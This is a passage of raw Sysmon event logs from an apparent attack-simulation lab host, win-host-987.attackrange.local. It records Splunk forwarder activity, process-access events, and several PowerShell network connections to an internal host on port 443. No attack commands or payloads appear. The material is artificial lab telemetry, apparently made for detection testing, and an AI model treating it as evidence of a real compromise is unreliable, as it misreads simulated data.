Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A16AA58341026BABFC69A37265ACF77,SHA256=18BA81C7670CD3BCA32F4771FDED747322FAF91CB45635293CC012ED8444543D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:27.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77EA5C4DF2DEE3D7854C0825B7F6647A,SHA256=9115856D012691E033E1DDDEAC97BC7DA96D2374B7ED456A3BD854BA084E5671,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:57.888{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50582-false10.0.1.12-8000- 23542300x800000000000000036497817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:28.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0241BAC0E7EB52BD80A66A958206DC7A,SHA256=AE6BCFF037D3D179F748BB813416E59984F24F3E6C653FEE5B510C05615CE170,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:28.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A52425FC9F77CF8E8C7D70CD8E72FEE6,SHA256=51588C7F2B0E9F3EA1C508803B99E1CCDDBE795FF6AC67F6B8F59861F5787C4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:29.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E1119316D9ED17620511A61699D70A,SHA256=661B513F39074CC8148E92713F096EEF641EB1F2EE288DBA5D5E98646DDA0646,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:59.440{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50583-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:30.998{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BA73277CC6ABAC0EA414B4828F0C51,SHA256=CEE9D3707A2190F612147F7FC570FAC8C41D6A0ACFFA961489C06E47F8C7366E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497822Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:32.581{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:32.014{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=838FA5AD62ADA3EAC6A45DD62D9ABE71,SHA256=3937A9AD092CE474D2818483F36E2DA425CBF7D53CFE6F498CE981A597A83D2A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:33.995{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B0603E918B92823BBBD8E7ACAE616EFF,SHA256=E4CCE7B50B83BA1AD77360B8BF56091AD745046A1E57EBB1DD98442002E522AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.251{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50585-false10.0.1.12-8089- 354300x800000000000000036497824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:03.898{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50584-false10.0.1.12-8000- 23542300x800000000000000036497823Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:33.065{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=909AE65EE83611072F148FED1D790A67,SHA256=E33EB3D5E9B34D917FB6346CFC354F682848D0E64665DBB719BD541428B440D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:04.451{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50586-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:34.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FF0E0CE80A8C4BEBBD027466D97C343,SHA256=22FF3990B5E5698E83D802D8DBC41EC395298633C87BD2918C22C2806408B0D9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:35.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60678DDD16DD083A916599633199631,SHA256=C2B6163804289AEEABDCED4C4A264E1C0638C398896C845BC741B38129A1F0C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:36.146{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E1426C603F7513F3B8BC6A5AEFCB906,SHA256=8C3F7DFE663352708ABAFEED0E51D0B605ACC281DB020424E77E8E637D14BD70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.930{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.914{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.913{B81B27B7-A169-6140-9156-04000000C801}5888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:37.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=931E0DB0F473ED4D89CFE874DF8595B8,SHA256=99877D6FFD4F8DF542F408C8D7D9711D5E34263B6521913BF5505E1184C59F90,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497852Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30839BB7FE946A943CB4344C61DCD932,SHA256=A4D5012C2A9ADDA88BA56C70ADECD614809D1CC67FA387838BE1D2C337506FBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497851Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=015DDB324B7D6FEC05ED8CE29FACCC99,SHA256=15718DDDC8A753803247D3DE9071977FDADBD6440B7AA10E79C6457B3F63DFE2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497850Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.776{B81B27B7-A16A-6140-9256-04000000C801}27565452C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497849Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A16A-6140-9256-04000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497848Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497847Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497846Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497845Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497844Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A16A-6140-9256-04000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497843Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.613{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A16A-6140-9256-04000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497842Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.608{B81B27B7-A16A-6140-9256-04000000C801}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497841Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8456B8E7A2962E22FC2AE659CDC548D6,SHA256=E37B07CAAA3D76D5F0AFE588AC0068F0FA643A780F4B4267ACF298B39EA9BFA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497840Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:19:38.092{B81B27B7-A169-6140-9156-04000000C801}58886692C:\Program 